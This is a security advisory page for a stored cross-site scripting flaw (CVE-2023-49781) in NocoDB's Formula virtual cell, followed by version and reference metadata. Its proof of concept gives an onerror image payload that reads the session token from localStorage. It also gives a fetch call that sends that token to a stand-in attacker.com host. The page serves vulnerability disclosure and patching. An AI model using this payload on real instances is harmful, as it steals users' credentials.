Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1oNnI0LXh2dzYtamM1aM4AA74t
NocoDB Vulnerable to Stored Cross-Site Scripting in Formula.vue
Summary
A stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality.
Details
The nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of "urls" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag with href=XXX. However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged, which makes the evil users can create a malicious table with a formula field whose payload is <img src=1 onerror="malicious javascripts"URI::(XXX). The evil users then can share this table with others by enabling public viewing and the victims who open the shared link can be attacked.
PoC
Step 1: Attacker login the nocodb and creates a table with two fields, "T" and "F". The type of field "T" is "SingleLineText", and the type of the "F" is "Fomula" with the formula content {T}
Step 2: The attacker sets the contents of T using <img src=1 onerror=alert(localStorage.getItem('nocodb-gui-v2'))URI::(XXX)
Step 3: The attacker clicks the "Share" button and enables public viewing, then copies the shared link and sends it to the victims
Step 4: Any victims who open the shared link in their browsers will see the alert with their confidential tokens stored in localStorage
The attackers can use the fetch(http://attacker.com/?localStorage.getItem('nocodb-gui-v2')) to replace the alert and then steal the victims' credentials in their attacker.com website.
Impact
Stealing the credentials of NocoDB user that clicks the malicious link.
Permalink: https://github.com/advisories/GHSA-h6r4-xvw6-jc5hJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oNnI0LXh2dzYtamM1aM4AA74t
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 7 months ago
Updated: 7 months ago
CVSS Score: 7.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
Identifiers: GHSA-h6r4-xvw6-jc5h, CVE-2023-49781
References:
- https://github.com/nocodb/nocodb/security/advisories/GHSA-h6r4-xvw6-jc5h
- https://github.com/nocodb/nocodb/commit/7f58ce3726dfec71537d8b80474a0f95a48a1574
- https://nvd.nist.gov/vuln/detail/CVE-2023-49781
- https://github.com/advisories/GHSA-h6r4-xvw6-jc5h
Blast Radius: 12.3
Affected Packages
npm:nocodb
Dependent packages: 1Dependent repositories: 49
Downloads: 2,146 last month
Affected Version Ranges: <= 0.202.8
Fixed in: 0.202.9
All affected versions: 0.0.1, 0.1.29, 0.1.30, 0.1.31, 0.1.32, 0.1.33, 0.1.34, 0.1.35, 0.1.36, 0.1.37, 0.1.38, 0.9.11, 0.9.12, 0.9.13, 0.9.14, 0.9.15, 0.9.16, 0.9.17, 0.9.18, 0.9.19, 0.9.20, 0.9.21, 0.9.22, 0.9.23, 0.9.24, 0.9.25, 0.9.26, 0.9.27, 0.9.28, 0.9.29, 0.9.30, 0.9.31, 0.9.32, 0.9.33, 0.9.34, 0.9.35, 0.9.36, 0.9.37, 0.9.38, 0.9.39, 0.9.40, 0.9.41, 0.9.42, 0.9.43, 0.10.0, 0.10.1, 0.10.2, 0.10.3, 0.10.4, 0.10.5, 0.10.6, 0.11.0, 0.11.1, 0.11.2, 0.11.3, 0.11.4, 0.11.5, 0.11.7, 0.11.8, 0.11.9, 0.11.10, 0.11.11, 0.11.12, 0.11.13, 0.11.14, 0.11.15, 0.11.16, 0.11.17, 0.11.18, 0.11.19, 0.11.20, 0.11.21, 0.11.22, 0.11.23, 0.11.24, 0.11.25, 0.11.26, 0.11.27, 0.11.28, 0.11.29, 0.11.30, 0.11.32, 0.11.33, 0.11.34, 0.11.35, 0.11.36, 0.11.38, 0.11.39, 0.11.40, 0.11.41, 0.11.42, 0.11.43, 0.11.44, 0.11.45, 0.11.46, 0.80.0, 0.80.1, 0.81.0, 0.81.1, 0.82.0, 0.83.0, 0.83.1, 0.83.2, 0.83.3, 0.83.4, 0.83.5, 0.83.6, 0.83.8, 0.84.0, 0.84.1, 0.84.2, 0.84.3, 0.84.4, 0.84.5, 0.84.6, 0.84.7, 0.84.8, 0.84.9, 0.84.10, 0.84.12, 0.84.13, 0.84.14, 0.84.15, 0.84.16, 0.84.18, 0.90.0, 0.90.1, 0.90.2, 0.90.3, 0.90.4, 0.90.5, 0.90.7, 0.90.8, 0.90.9, 0.90.10, 0.90.11, 0.91.0, 0.91.1, 0.91.3, 0.91.6, 0.91.7, 0.91.8, 0.91.9, 0.91.10, 0.92.0, 0.92.1, 0.92.2, 0.92.3, 0.92.4, 0.96.0, 0.96.1, 0.96.2, 0.96.3, 0.96.4, 0.97.0, 0.98.0, 0.98.1, 0.98.2, 0.98.3, 0.98.4, 0.99.0, 0.99.1, 0.99.2, 0.100.0, 0.100.1, 0.100.2, 0.101.0, 0.101.1, 0.101.2, 0.104.0, 0.104.1, 0.104.2, 0.104.3, 0.105.0, 0.105.1, 0.105.2, 0.105.3, 0.106.0, 0.106.1, 0.107.0, 0.107.1, 0.107.2, 0.107.3, 0.107.4, 0.107.5, 0.108.0, 0.108.1, 0.109.0, 0.109.1, 0.109.2, 0.109.3, 0.109.4, 0.109.5, 0.109.6, 0.109.7, 0.111.0, 0.111.1, 0.111.2, 0.111.3, 0.111.4, 0.200.0, 0.202.0, 0.202.4, 0.202.5, 0.202.6, 0.202.7, 0.202.8
All unaffected versions: 0.202.9, 0.202.10, 0.203.0, 0.203.1, 0.203.2, 0.204.0, 0.204.1, 0.204.2, 0.204.3, 0.204.4, 0.204.5, 0.204.6, 0.204.7, 0.204.8, 0.204.9, 0.205.0, 0.205.1, 0.207.0, 0.207.1, 0.207.2, 0.207.3, 0.250.0, 0.250.1, 0.250.2, 0.251.0, 0.251.1, 0.251.2, 0.251.3, 0.252.0, 0.254.1, 0.255.0, 0.255.1, 0.255.2, 0.256.0, 0.257.0, 0.257.2, 0.258.0, 0.258.1, 0.258.2